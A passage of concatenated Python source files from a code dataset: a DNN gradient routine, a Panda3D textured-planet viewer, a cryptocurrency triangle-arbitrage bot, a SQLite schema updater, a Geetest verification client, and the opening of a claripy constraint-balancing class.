Y_reference\n\n # Loop backwards through layers\n for l in reversed(range(1, L + 1)):\n # Gradient of weight l\n grad_params[\"grad_W_\" + str(l)] = np.dot(features[\"A_\" + str(l - 1)], dZ.T) / m #\n # Gradient of bias l\n grad_params[\"grad_b_\" + str(l)] = np.sum(dZ, axis=1, keepdims=True) / m\n\n # Calculate new output gradient\n if l > 1:\n gZ = activation_derivative(features[\"Z_\" + str(l - 1)], \"relu\")\n wdZ = np.sum((params[\"W_\" + str(l)].T)[:, :, np.newaxis] * dZ[:, np.newaxis, :], axis=0)\n dZ = gZ * wdZ\n return grad_params, dZ\n","sub_path":"project3/src/dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206953071","text":"from direct.showbase.ShowBase import ShowBase\nfrom direct.actor.Actor import Actor\nfrom direct.filter.CommonFilters import CommonFilters\nfrom panda3d.core import PerlinNoise2, PNMImage, PointLight, Shader, Texture, Vec3, Vec4, loadPrcFileData\n\n# atashi iya ne\nloadPrcFileData('', \"\"\"\n frame-rate-meter-side-margin 0.1\n show-frame-rate-meter 1\n framebuffer-multisample 1\n multisamples 2\n fullscreen 1\n win-size 1920 1080\n\"\"\")\n\nfrom pandac.PandaModules import *\nfrom direct.task import Task\nimport numpy as np\nfrom projec import convert\n\nclass mesh:\n def __init__(self, path):\n self.nodePath = self.mesh()\n self.nodePath.reparentTo(path)\n \n def mesh(self):\n self.format = GeomVertexFormat.getV3n3c4t2()\n self.data = GeomVertexData('quadFace', self.format, Geom.UHStatic)\n for attr in ['vertex', 'normal', 'color', 'texcoord']:\n setattr(self, attr, GeomVertexWriter(self.data, attr))\n self.triangles = GeomTriangles(Geom.UHStatic)\n self.create()\n \n mesh = Geom(self.data)\n mesh.addPrimitive(self.triangles)\n mnode = GeomNode('quadface')\n mnode.addGeom(mesh)\n \n return base.render.attachNewNode(mnode)\n \n def addvertex(self, pos, nor, tex):\n self.vertex.addData3f(*pos)\n self.normal.addData3f(*nor)\n self.texcoord.addData2f(*tex)\n \n def addtriang(self, i, j, l):\n self.triangles.addVertices(i, j, l)\n\n def create(self):\n raise NotImplementedError()\n\nclass cube(mesh):\n def create(self):\n for x in [-1, 1]:\n for y in [-1, 1]:\n for z in [-1, 1]:\n r = (x*x + y*y + z*z)**0.5\n self.addvertex((x, y, z), (x/r, y/r, z/r), (0, 0))\n \n def do(a, b, c):\n self.addtriang(a, a^b, a^c)\n self.addtriang(a^c, a^b, a^b^c)\n \n # sides\n do(0, 4, 1)\n do(0, 2, 4)\n do(2, 1, 4)\n do(1, 4, 2)\n #top\n do(4, 2, 1)\n #bottom\n do(0, 1, 2)\n \n def texture(self, te):\n self.nodePath.setTexture(te)\nclass roundedplate(mesh):\n def create(self):\n POINTS = 33\n points = np.linspace(-1, 1, POINTS)\n for i in range(POINTS):\n for j in range(POINTS):\n x = points[j]\n y = points[i]\n u = (x + 1) / 2\n v = (y + 1) / 2\n #u = u * 0.999 + 0.0005\n #v = v * 0.999 + 0.0005\n X, Y, Z = convert.pt_to_sphere(x, y, 1)#pt2sphere(x, y)\n self.addvertex( (X, Y, Z), (X, Y, Z), (u, v) )\n \n def what(i, j):\n return POINTS * i + j\n \n for i in range(POINTS - 1):\n for j in range(POINTS - 1):\n self.addtriang(\n what(i, j),\n what(i, j+1),\n what(i+1, j)\n )\n self.addtriang(\n what(i, j+1),\n what(i+1, j+1),\n what(i+1, j)\n )\n \n sides = {\n \"top\": (0, 0, 0),\n \"bottom\": (0, 0, 180),\n \"front\": (0, 90, 180),\n \"back\": (0, 90, 0),\n \"left\": (0, 90, -90),\n \"right\": (0, 90, 90)\n }\n \n def side(self, which):\n self.nodePath.setHpr( *roundedplate.sides[which] )\n return self\n \n def texture(self, te):\n self.nodePath.setTexture(te, 3)\n return self\n \n def overlay(self, ts, te):\n self.nodePath.setTexture(ts, te)\n return self\n\n def clear(self, ts):\n self.nodePath.clearTexture(ts)\ndef maketexture(fn):\n te = loader.loadTexture(fn)\n te.setMinfilter(SamplerState.FT_linear_mipmap_linear)\n te.setAnisotropicDegree(16)\n te.setWrapU(Texture.WM_clamp)\n te.setWrapV(Texture.WM_clamp)\n return te\n \nclass planet:\n def __init__(self, nodepath):\n self.init()\n self.nodePath.reparentTo(nodepath) # iya\n \n def init(self):\n planet = NodePath('planet')\n #shaders = Shader.load(Shader.SLGLSL, 'vert.glsl', 'frag.glsl')\n #planet.setShader(shaders)\n \n material = Material()\n #material.setShininess(0.1)\n material.setShininess(1)\n material.setSpecular((0.2, 0.2, 0.2, 1))\n \n self.ov = TextureStage('overlay')\n self.ov.setMode(TextureStage.MDecal)\n self.textures = []\n self.overlays = []\n \n self.cube = []\n for (j, side) in enumerate(roundedplate.sides.keys()):\n self.textures.append( maketexture(\"satellite-%d.png\" % j) )\n #self.textures.append( maketexture(\"black.png\") )\n self.overlays.append( maketexture(\"satellite-goes-%d.png\" % j) )\n #te = maketexture(\"satellite-%d.png\" % j)\n #t2 = maketexture(\"satellite-goes-%d.png\" % j)\n self.cube.append(\n roundedplate(planet)\n .side(side)\n \n )\n \n self.texture()\n \n planet.setScale(0.9) #planet.setScale(0.95) #planet.setScale(1/2) # iya\n planet.setMaterial(material)\n self.nodePath = planet\n \n def texture(self):\n for c, t, t2 in zip(self.cube, self.textures, self.overlays):\n (c.texture(t)\n .overlay(self.ov, t2)\n \n )\n \n #for _ in self.cube:\n # _.texture(self.te).overlay(self.ov, self.t2)\n \n def overlayswitch(self, which):\n if which:\n self.texture()\n else:\n for c in self.cube:\n c.clear(self.ov)\n \nclass plight:\n def __init__(self):\n spot = Spotlight('spot')\n lens = PerspectiveLens()\n spot.setLens(lens)\n spot.setColor((1, 1, 1, 1))\n \n ambi = AmbientLight('ambient')\n ambi.setColor((0.4, 0.4, 0.4, 1))\n \n spotNP = render.attachNewNode(spot)\n spotNP.setPos(-2, -4, 2)\n #spotNP.setPos(-1, -2, 0)\n spotNP.lookAt(0, 0, 0)\n \n ambiNP = render.attachNewNode(ambi)\n \n self.spotNP = spotNP\n self.ambiNP = ambiNP\n self.lights = [self.spotNP, self.ambiNP]\n \n def on(self, bool=True):\n f = render.setLight if bool else render.clearLight\n for l in self.lights:\n f(l)\n \nclass Planet(ShowBase):\n def __init__(self):\n ShowBase.__init__(self)\n \n base.setBackgroundColor(0, 0, 0)\n \n render.setShaderAuto()\n\n render.setAntialias(AntialiasAttrib.MMultisample)\n base.disableMouse()\n base.camLens.setNearFar(0.1, 20)\n \n p = planet(base.render)\n \n \"\"\"\n cuby = cube(base.render)\n material = Material()\n material.setShininess(1)\n material.setSpecular((1, 0.2, 0.2, 1))\n cuby.nodePath.setScale(1/10)\n cuby.nodePath.setPos(0, -1, 0)\n cuby.nodePath.setMaterial(material)\n cuby.nodePath.reparentTo(p.nodePath)\n \"\"\"\n \n light = plight()\n light.on()\n \n self.taskMgr.add(self.rotator, \"rotateplanet\")\n\n self.taskMgr.add(self.cameracontrol, \"cameramove\")\n self.pausecontrol = False\n self.overlaycontrol = True\n \n #def out():\n # self.pausecontrol = not self.pausecontrol\n # base.oobe()\n \n #self.accept(\"o\", out)\n \n def tsswitch():\n print(\"switching\")\n self.overlaycontrol = not self.overlaycontrol\n p.overlayswitch(self.overlaycontrol)\n \n self.accept(\"o\", tsswitch)\n \n def rotator(self, task):\n planet = render.find(\"planet\")\n planet.setHpr(task.time*3, 0, 0)\n return Task.cont\n\n def cameracontrol(self, task):\n if self.pausecontrol:\n return\n \n def mouse():\n props = base.win.getProperties()\n w, h = props.getXSize(), props.getYSize()\n r = w / h\n if base.mouseWatcherNode.hasMouse():\n x, y = base.mouseWatcherNode.getMouseX(), base.mouseWatcherNode.getMouseY()\n return x * r, y, r\n # rar\n else:\n return 0, 0, r\n \n planet = render.find(\"planet\")\n x, y, r = mouse()\n # atashi iya ne\n offset = LVector3(x, -6, y)\n ul, ur, ll, lr = (\n LPoint3(-r, 0, 1) - offset,\n LPoint3(r, 0, 1) - offset,\n LPoint3(-r, 0, -1) - offset,\n LPoint3(r, 0, -1) - offset\n )\n base.camLens.setFrustumFromCorners(ul, ur, ll, lr, Lens.FC_off_axis | Lens.FC_aspect_ratio | Lens.FC_shear)\n base.cam.setPos(offset)\n return Task.cont\n \napp = Planet()\napp.run()\n","sub_path":"pics/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"37143219","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport logging\n\nimport time\n\nfrom quant import config\nfrom quant.brokers import broker_factory\nfrom .basicbot import BasicBot\n\n\nclass TriangleArbitrage(BasicBot):\n \"\"\"\n bitfinex和liqui的三角套利\n python -m quant.cli -mBitfinex_BCH_USD,Liqui_BCC_BTC,Bitfinex_BTC_USD t-watch-bitfinex-liqui-usd-bch-btc -v\n 待调整参数:\n profit>10 ? 大于多少合适\n \"\"\"\n\n def __init__(self, base_pair, pair1, pair2, monitor_only=False):\n super(TriangleArbitrage, self).__init__()\n\n self.base_pair = base_pair\n self.pair_1 = pair1\n self.pair_2 = pair2\n self.monitor_only = monitor_only\n\n self.brokers = broker_factory.create_brokers([self.base_pair, self.pair_1, self.pair_2])\n\n self.last_trade = 0\n self.min_amount_bch = 0.001\n self.min_amount_btc = 0.005\n # 保留的小树位精度\n self.precision = 2\n # 赢利触发点\n self.profit_trigger = 1.5\n self.skip = False\n\n # 分别的手续费\n self.fee_base = 0.002\n self.fee_pair1 = 0.0025\n self.fee_pair2 = 0.002\n\n def is_depths_available(self, depths):\n return self.base_pair in depths and self.pair_1 in depths and self.pair_2 in depths\n\n def tick(self, depths):\n self.update_balance()\n if not self.is_depths_available(depths):\n # logging.debug(\"depths is not available\")\n return\n self.skip = False\n self.forward(depths)\n self.reverse(depths)\n\n def forward(self, depths):\n logging.info(\"==============正循环, base买 合成卖==============\")\n base_pair_ask_amount = depths[self.base_pair]['asks'][0]['amount']\n base_pair_ask_price = depths[self.base_pair]['asks'][0]['price']\n base_pair_ask_price_real = base_pair_ask_price * (1 + self.fee_base)\n\n logging.info(\"forward======>base_pair: %s ask_price:%s\" % (self.base_pair, base_pair_ask_price))\n\n \"\"\"所有的real都是带手续费的价格\"\"\"\n pair1_bid_amount = depths[self.pair_1]['bids'][0]['amount']\n pair1_bid_price = depths[self.pair_1]['bids'][0]['price']\n pair1_bid_price_real = pair1_bid_price * (1 - self.fee_pair1)\n\n pair2_bid_amount = depths[self.pair_2]['bids'][0]['amount']\n pair2_bid_price = depths[self.pair_2]['bids'][0]['price']\n pair2_bid_price_real = pair2_bid_price * (1 - self.fee_pair2)\n\n \"\"\"合成后的价格对标bch_usd, 以目前的bfx的价格设置小数位保留2位比较合适\"\"\"\n synthetic_bid_price = round(pair1_bid_price * pair2_bid_price, self.precision)\n synthetic_bid_price_real = round(pair1_bid_price_real * pair2_bid_price_real, self.precision)\n \"\"\"价差, diff=卖-买, 对标的是usd, 小数位保留2\"\"\"\n p_diff = synthetic_bid_price - base_pair_ask_price\n\n logging.info(\"forward======>%s bid_price: %s, %s bid_price: %s\" %\n (self.pair_1, pair1_bid_price, self.pair_2, pair2_bid_price))\n logging.info(\"forward======>synthetic_bid_price: %s, p_diff: %s\" % (synthetic_bid_price, p_diff))\n\n if pair1_bid_price == 0:\n return\n\n pair_2to1_bch_amount = round(pair2_bid_amount / pair1_bid_price, 8)\n\n \"\"\"市场限制base最多能买多少个bch, pair1 最多能卖多少个bch, 并且在上线和下线范围内[5, 0.05]\"\"\"\n \"\"\"吃单50%, 两个目的:1,增加成交几率; 2,在🈷️余额充足的前提下,委单的手续费部分可能不能成交(极端)\"\"\"\n max_trade_amount = config.bch_max_tx_volume\n min_trade_amount = config.bch_min_tx_volume\n hedge_bch_amount_market = min(base_pair_ask_amount, pair1_bid_amount)\n hedge_bch_amount_market = min(hedge_bch_amount_market, pair_2to1_bch_amount)\n hedge_bch_amount_market = min(max_trade_amount, hedge_bch_amount_market)\n hedge_bch_amount_market = hedge_bch_amount_market / 2\n hedge_btc_amount_market = round(hedge_bch_amount_market * pair1_bid_price, 8)\n\n if self.monitor_only:\n hedge_bch_amount = hedge_btc_amount_market\n hedge_btc_amount = hedge_bch_amount * pair1_bid_price\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bitfinex限制bch_usd最小可交易的bch order size为0.001\"\"\"\n logging.info(\"forward======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc:\n \"\"\"bitfinex限制btc_usd最小可交易amount为0.005, liqui限制单次交易btc的amount为0.0001, 所以这里取0.005\"\"\"\n logging.info(\"forward======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n else:\n \"\"\"余额限制base最多能买多少个bch, pair1 最多能卖多少个bch, 要带上手续费\"\"\"\n hedge_bch_amount_balance = round(min(self.brokers[self.pair_1].bch_available,\n self.brokers[self.base_pair].usd_available / base_pair_ask_price_real),\n 8)\n hedge_btc_amount_balance = round(min(self.brokers[self.pair_2].btc_available,\n self.brokers[self.pair_1].bch_available * pair1_bid_price_real), 8)\n\n \"\"\"取市场和余额共同限制的amount\"\"\"\n hedge_bch_amount = min(hedge_bch_amount_market, hedge_bch_amount_balance, min_trade_amount)\n hedge_btc_amount = hedge_bch_amount * pair1_bid_price\n\n logging.info(\"forward======>balance allow bch: %s and btc: %s, market allow bch: %s and btc: %s \" %\n (hedge_bch_amount_balance, hedge_btc_amount_balance,\n hedge_bch_amount_market, hedge_btc_amount_market))\n\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bitfinex限制bch_usd最小可交易的bch order size为0.001\"\"\"\n logging.info(\"forward======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc or hedge_btc_amount > hedge_btc_amount_balance:\n \"\"\"bitfinex限制btc_usd最小可交易amount为0.005, liqui限制单次交易btc的amount为0.0001, 所以这里取0.005\"\"\"\n \"\"\"btc余额不足也不行\"\"\"\n logging.info(\"forward======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n\n \"\"\"\n 计算的关键点在于bcc和btc的买卖amount除去手续费后是相同的,也就是进行一个循环交易后bcc和btc的总量是不变的, 变的是usd\n profit=去除交易手续费后交易hedge_bch_amount的赢利\n \"\"\"\n t_price = round(synthetic_bid_price_real - base_pair_ask_price_real, self.precision)\n profit = round(t_price * hedge_bch_amount, self.precision)\n logging.debug(\"forward======>t_price: %s, profit: %s\" % (t_price, profit))\n if profit > 0:\n logging.info(\"forward======>find profit!!!: profit:%s, bch amount: %s and btc amount: %s, t_price: %s\" %\n (profit, hedge_bch_amount, hedge_btc_amount, t_price))\n if profit < self.profit_trigger:\n logging.warn(\"forward======>profit should >= %s usd\" % self.profit_trigger)\n return\n\n current_time = time.time()\n if current_time - self.last_trade < 5:\n logging.warn(\"forward======>Can't automate this trade, last trade \" +\n \"occured %.2f seconds ago\" %\n (current_time - self.last_trade))\n return\n\n if not self.monitor_only:\n logging.info(\"forward======>Ready to trade\")\n amount_base = hedge_bch_amount * (1 + self.fee_base)\n amount_pair2 = hedge_bch_amount * pair1_bid_price * (1 - self.fee_pair1)\n self.new_order(market=self.base_pair, order_type='buy', amount=amount_base,\n price=base_pair_ask_price)\n self.new_order(market=self.pair_1, order_type='sell',\n amount=hedge_bch_amount, price=pair1_bid_price)\n self.new_order(market=self.pair_2, order_type='sell', amount=amount_pair2,\n price=pair2_bid_price)\n self.skip = True\n\n self.last_trade = time.time()\n\n def reverse(self, depths):\n if self.skip and (not self.monitor_only):\n return\n logging.info(\"==============逆循环, base卖 合成买==============\")\n base_pair_bid_amount = depths[self.base_pair]['bids'][0]['amount']\n base_pair_bid_price = depths[self.base_pair]['bids'][0]['price']\n base_pair_bid_price_real = base_pair_bid_price * (1 - self.fee_base)\n\n logging.info(\"reverse======>base_pair: %s bid_price:%s\" % (self.base_pair, base_pair_bid_price))\n\n pair1_ask_amount = depths[self.pair_1]['asks'][0]['amount']\n pair1_ask_price = depths[self.pair_1]['asks'][0]['price']\n pair1_ask_price_real = pair1_ask_price * (1 + self.fee_pair1)\n\n pair2_ask_amount = depths[self.pair_2]['asks'][0]['amount']\n pair2_ask_price = depths[self.pair_2]['asks'][0]['price']\n pair2_ask_price_real = pair2_ask_price * (1 + self.fee_pair2)\n\n synthetic_ask_price = round(pair1_ask_price * pair2_ask_price, self.precision)\n synthetic_ask_price_real = round(pair1_ask_price_real * pair2_ask_price_real, self.precision)\n p_diff = base_pair_bid_price - synthetic_ask_price\n\n logging.info(\"reverse======>%s ask_price: %s, %s ask_price: %s\" %\n (self.pair_1, pair1_ask_price, self.pair_2, pair2_ask_price))\n logging.info(\"reverse======>synthetic_ask_price: %s, p_diff: %s\" % (synthetic_ask_price, p_diff))\n if pair1_ask_price == 0 or pair2_ask_price == 0:\n return\n\n pair_2to1_bch_amount = round(pair2_ask_amount / pair1_ask_price, 8)\n\n \"\"\"市场限制base最多能卖多少个bch, pair1 最多能买多少个bch, 并且在上线和下线范围内[5, 0.05]\"\"\"\n \"\"\"吃单50%, 两个目的:1,增加成交几率; 2,在🈷️余额充足的前提下,委单的手续费部分可能不能成交(极端)\"\"\"\n max_trade_amount = config.bch_max_tx_volume\n min_trade_amount = config.bch_min_tx_volume\n hedge_bch_amount_market = min(base_pair_bid_amount, pair1_ask_amount)\n hedge_bch_amount_market = min(hedge_bch_amount_market, pair_2to1_bch_amount)\n hedge_bch_amount_market = min(max_trade_amount, hedge_bch_amount_market)\n hedge_bch_amount_market = hedge_bch_amount_market / 2\n hedge_btc_amount_market = round(hedge_bch_amount_market * pair1_ask_price, 8)\n\n if self.monitor_only:\n hedge_bch_amount = hedge_bch_amount_market\n hedge_btc_amount = hedge_bch_amount * pair1_ask_price\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bfx限制bch最小订单数量为0.001\"\"\"\n logging.info(\"reverse======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc:\n \"\"\"lq限制最小btc的total为0.0001, bfx的bch_usd交易订单限制amount为0.005\"\"\"\n logging.info(\"reverse======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n else:\n \"\"\"余额限制base最多能卖多少个bch, pair1 最多能买多少个bch, 要带上手续费\"\"\"\n hedge_bch_amount_balance = min(self.brokers[self.base_pair].bch_available,\n self.brokers[self.pair_1].btc_available * pair1_ask_price_real)\n hedge_btc_amount_balance = min(self.brokers[self.pair_2].usd_available * pair2_ask_price_real,\n self.brokers[self.pair_1].btc_available)\n\n hedge_bch_amount = min(hedge_bch_amount_market, hedge_bch_amount_balance, min_trade_amount)\n hedge_btc_amount = hedge_bch_amount * pair1_ask_price\n\n logging.info(\"reverse======>balance allow bch: %s and btc: %s, market allow bch: %s and btc: %s \" %\n (hedge_bch_amount_balance, hedge_btc_amount_balance,\n hedge_bch_amount_market, hedge_btc_amount_market))\n\n if hedge_bch_amount < self.min_amount_bch:\n \"\"\"bfx限制bch最小订单数量为0.001\"\"\"\n logging.info(\"reverse======>hedge_bch_amount is too small! %s\" % hedge_bch_amount)\n return\n\n if hedge_btc_amount < self.min_amount_btc or hedge_btc_amount > hedge_btc_amount_balance:\n \"\"\"lq限制最小btc的total为0.0001, bfx的bch_usd交易订单限制amount为0.005\"\"\"\n \"\"\"并且不能大于余额的限制\"\"\"\n logging.info(\"reverse======>hedge_btc_amount is too small! %s\" % hedge_btc_amount)\n return\n\n \"\"\"\n 计算的关键点在于bcc和btc的买卖amount除去手续费后是相同的,也就是进行一个循环交易后bcc和btc的总量是不变的, 变的是usd\n profit=去除交易手续费后交易hedge_bch_amount的赢利\n \"\"\"\n t_price = round(base_pair_bid_price_real - synthetic_ask_price_real, self.precision)\n profit = round(t_price * hedge_bch_amount, self.precision)\n logging.debug(\"forward======>t_price: %s, profit: %s\" % (t_price, profit))\n if profit > 0:\n logging.info(\"reverse======>find profit!!!: profit:%s, bch amount: %s and btc amount: %s, t_price: %s\" %\n (profit, hedge_bch_amount, hedge_btc_amount, t_price))\n if profit < self.profit_trigger:\n logging.warn(\"reverse======>profit should >= %s usd\" % self.profit_trigger)\n return\n\n current_time = time.time()\n if current_time - self.last_trade < 5:\n logging.warn(\"reverse======>Can't automate this trade, last trade \" +\n \"occured %.2f seconds ago\" %\n (current_time - self.last_trade))\n return\n if not self.monitor_only:\n logging.info(\"reverse======>Ready to trade\")\n amount_pair1 = hedge_bch_amount * (1 + self.fee_pair1)\n amount_pair2 = hedge_bch_amount * pair1_ask_price * (1 + self.fee_pair2) * (1 + self.fee_pair1)\n self.new_order(market=self.base_pair, order_type='sell', amount=hedge_bch_amount,\n price=base_pair_bid_price)\n self.new_order(market=self.pair_1, order_type='buy', amount=amount_pair1, price=pair1_ask_price)\n self.new_order(market=self.pair_2, order_type='buy', amount=amount_pair2, price=pair2_ask_price)\n self.skip = True\n\n self.last_trade = time.time()\n\n # def update_balance(self):\n # super(TriangleArbitrage, self).update_balance()\n # for name in self.brokers:\n # broker = self.brokers[name]\n # logging.info(\"%s btc balance: %s\" % (broker.name, broker.btc_available))\n # logging.info(\"%s bch balance: %s\" % (broker.name, broker.bch_available))\n","sub_path":"quant/observers/t_bfx_lq.py","file_name":"t_bfx_lq.py","file_ext":"py","file_size_in_byte":15488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"290096843","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport sqlite3\nimport traceback\nconn = sqlite3.connect('data.sqlite')\nc = conn.cursor()\ndef myZhengli(raw):\n print(dir(raw))\n fs=raw.description\n res=[]\n for one in raw:\n o1={}\n i=0\n for a in one:\n o1[fs[i][0]]=a\n i+=1\n res.append(o1)\n return res\ndef testRaw():\n cmd=\"select * from parts_contact where work_month IS NULL and tiaoshi_date between '2016-10-17' and '2016-12-17'\"\n raw=c.execute(cmd)\n r=myZhengli(raw) \n print(r)\ndef update1():\n # c.execute('alter table parts_contact add column dianqi varchar(30)') \n # c.execute('alter table parts_contact add column jixie varchar(30)') \n # c.execute('alter table parts_contact add column hongwai varchar(30)') \n # c.execute('alter table parts_contact add column redao varchar(30)') \n c.execute('alter table parts_contact add column work_month date') \n conn.commit()\n# r=testRaw()\n# update1()\n#c.execute('select * from parts_pack where name=\"ON必备英文\"')\n# # items=[]\n# for row in c:\n# s=\"\"\n# for r in row:\n# s+=str(r)+'\\t'\n# print(s)\n\n# # We can also close the cursor if we are done with it\n# c.close()\n# def remove(cmd):\n# cs=cmd.split(\"\\n\")\n# r=\"\"\n# for c in cs:\n# if c[:2]==\"--\":\n# pass\n# else:\n# r+=c+\"\\n\"\n# return r\ndef updateDb():\n cmds=codecs.open(\"tableStruct.sql\",\"r\",'gb18030').read().split(\";\")\n for cmd in cmds:\n try:\n print(cmd)\n c.execute(cmd)\n except sqlite3.OperationalError as e:\n traceback.print_exc()\n if \"already exists\" in str(e):\n pass\n else:\n input(\"pause\")\n except sqlite3.IntegrityError as e:\n pass\n conn.commit()\nupdateDb() ","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"461788934","text":"from _md5 import md5\nimport time\n\nimport requests\nfrom pprint import pprint\nimport json\n\n\nclass Geetest:\n id = \"b1f425b289361afab1c3624e916a5b7d\" # 您的id, 在极验后台获取\n key = \"6891701a158938f1596941a000b7cfa0\" # 您的私钥, 在极验后台获取\n API_URL = \"http://api.geetest.com/gt_verify\"\n\n @staticmethod\n def verify(challenge, phone):\n seccode = md5((Geetest.key + challenge).encode()).hexdigest()\n query = {\n \"id\": id,\n \"seccode\": seccode,\n \"idType\": \"1\",\n \"idValue\": md5(phone.encode()).hexdigest(),\n \"challenge\": challenge,\n \"user_ip\": \"1.2.3.4\",\n \"timestamp\": time.time(),\n \"crash\": \"0\",\n }\n print(\"query:\", query)\n resp = requests.post(Geetest.API_URL, data=query)\n print(\"response:\", resp)\n result = resp.content\n print(\"result:\", )\n pprint(json.loads(result.decode()))\n return result.json()['success']\n","sub_path":"Base/geetests.py","file_name":"geetests.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125943847","text":"import logging\n\nl = logging.getLogger('claripy.balancer')\n\nclass Balancer(object):\n '''\n The Balancer is an equation redistributor. The idea is to take an AST and\n rebalance it to, for example, isolate unknown terms on one side of an\n inequality.\n '''\n\n def __init__(self, backend):\n self._backend = backend\n\n def constraint_to_si(self, expr):\n \"\"\"\n We take in constraints, and convert them into constrained strided-intervals.\n\n For example, expr =\n ,\n 0x1[0x0, 0x100]>, )>,\n ,\n \n )>\n )>\n )>,\n 0\n )>\n The result would be\n [ ( SI_1208<64>0x1[0x0, 0x100], SI_XXXX<64>0x1[0x0, 0x27] ) ]\n\n As we can only deal with bits, we will convert all integers into BVV during the solving and conversion process.\n\n :param expr: The constraint\n :return: whether the expr is satisfiable (boolean), and a list of tuples in form of\n (original_si, constrained_si).\n \"\"\"\n\n try:\n sat, lst = self._handle(expr.op, expr.args)\n return sat, lst\n\n except ClaripyBalancerError as ex:\n l.error('VSASimplifiers raised an exception %s. Please report it.', str(ex), exc_info=True)\n\n # return the dummy result\n return True, [ ]\n\n def _simplify(self, op, args, expr, condition):\n handler_name = \"_simplify_%s\" % op\n if not hasattr(self, handler_name):\n l.error('Simplification handler \"%s\" is not found in balancer. Consider implementing.', handler_name)\n return expr, condition\n\n new_expr, new_cond = getattr(self, \"_simplify_%s\" % op)(args, expr, condition)\n return new_expr, new_cond\n\n def _handle(self, op, args):\n\n if len(args) == 2:\n lhs, rhs = args\n\n # Simplify left side\n lhs, new_cond = self._simplify(lhs.op, lhs.args, lhs, (op, rhs))\n\n # Update args\n op, rhs = new_cond\n args = (lhs, rhs)\n\n sat, lst = getattr(self, \"_handle_%s\" % op)(args)\n\n else:\n sat, lst = getattr(self, \"_handle_%s\" % op)(args)\n\n return sat, lst\n\n #\n # Dealing with constraints\n #\n\n reversed_operations = { }\n reversed_operations['__ne__'] = '__eq__'\n reversed_operations['__eq__'] = '__ne__'\n reversed_operations['ULT'] = 'UGE'\n reversed_operations['UGT'] = 'ULE'\n reversed_operations['ULE'] = 'UGT'\n reversed_operations['UGE'] = 'ULT'\n reversed_operations['SLT'] = 'SGE'\n reversed_operations['SLE'] = 'SGT'\n reversed_operations['SGT'] = 'SLE'\n reversed_operations['SGE'] = 'SLT'\n reversed_operations['__le__'] = '__gt__'\n reversed_operations['__lt__'] = '__ge__'\n reversed_operations['__ge__'] = '__lt__'\n reversed_operations['__gt__'] = '__le__'\n\n comparison_info = { }\n # Tuples look like (is_lt, is_eq, is_unsigned)\n comparison_info['SLT'] = (True, False, False)\n comparison_info['SLE'] = (True, True, False)\n comparison_info['SGT'] = (False, False, False)\n comparison_info['SGE'] = (False, True, False)\n comparison_info['ULT'] = (True, False, True)\n comparison_info['ULE'] = (True, True, True)\n comparison_info['UGT'] = (False, False, True)\n comparison_info['UGE'] = (False, True, True)\n comparison_info['__lt__'] = comparison_info['ULT']\n comparison_info['__le__'] = comparison_info['ULE']\n comparison_info['__gt__'] = comparison_info['UGT']\n comparison_info['__ge__'] = comparison_info['UGE']\n\n def _simplify_ZeroExt(self, args, expr, condition):\n \"\"\"\n :param args:\n :param expr:\n :return: (new ast, new condition)\n \"\"\"\n cond_op, cond_arg = condition\n # Normalize cond_arg\n if type(cond_arg) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, expr.size())\n\n extended_bits, arg = args\n\n if cond_arg.size() <= arg.size() or \\\n is_true(cond_arg[ expr.size() - 1 : expr.size() - extended_bits ] == 0):\n # We can safely eliminate this layer of ZeroExt\n if cond_arg.size() < arg.size():\n larger_cond_arg = cond_arg.zero_extend(arg.size() - cond_arg.size())\n if not isinstance(self._backend.convert(larger_cond_arg), Base):\n return self._simplify(arg.op, arg.args, arg, (cond_op, larger_cond_arg))\n else:\n return self._simplify(arg.op, arg.args, arg, (cond_op, cond_arg[ arg.size() - 1 : 0 ]))\n\n else:\n # TODO: We may also handle the '__eq__' and '__ne__' case\n # We cannot handle this...\n return expr, condition\n\n def _simplify_BVS(self, args, expr, condition): #pylint:disable=no-self-use,unused-argument\n return expr, condition\n\n def _simplify_SignExt(self, args, expr, condition):\n \"\"\"\n\n :param args:\n :param expr:\n :param condition:\n :return:\n \"\"\"\n # TODO: Review the logic of this method\n cond_op, cond_arg = condition\n # Normalize them\n if type(cond_arg) in (int, long): #pylint:disable=unidiomatic-typecheck\n cond_arg = _all_operations.BVV(cond_arg, expr.size())\n\n extended_bits, arg = args\n\n if cond_arg.size() <= arg.size() or \\\n is_true(cond_arg[expr.size() - 1: expr.size() - extended_bits] == 0):\n # We can safely eliminate this layer of SignExt\n if cond_arg.size() < arg.size():\n larger_cond_arg = cond_arg.zero_extend(arg.size() - cond_arg.size()).resolved()\n if not isinstance(larger_cond_arg, Base):\n return self._simplify(arg.op, arg.args, arg, (cond_op, larger_cond_arg))\n else:\n return self._simplify(arg.op, arg.args, arg, (cond_op, cond_arg[arg.size() - 1: 0]))\n\n else:\n # TODO: We may also handle the '__eq__' and '__ne__' case\n # We cannot handle this...\n return expr, condition\n\n def _simplify_Extract(self, args, expr, condition):\n '''\n Convert Extract(a, b, If(...)) to If(..., Extract(a, b, ...), Extract(a, b, ...))\n\n :param 